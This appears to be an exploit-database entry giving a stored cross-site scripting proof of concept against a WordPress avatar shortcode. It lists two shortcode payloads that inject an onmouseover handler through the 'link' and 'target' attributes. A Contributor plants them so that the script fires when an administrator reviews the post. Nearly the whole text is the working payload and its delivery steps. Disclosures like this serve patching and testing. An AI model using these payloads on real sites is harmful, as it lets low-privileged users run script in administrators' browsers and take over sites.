## https://sploitus.com/exploit?id=WPEX-ID:273A95BF-39FE-4BA7-BC14-9527ACFD9F42
As a Contributor+ create a new post and add one of the following shortcode.
[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]
[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]
Save it to be reviewed.
When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.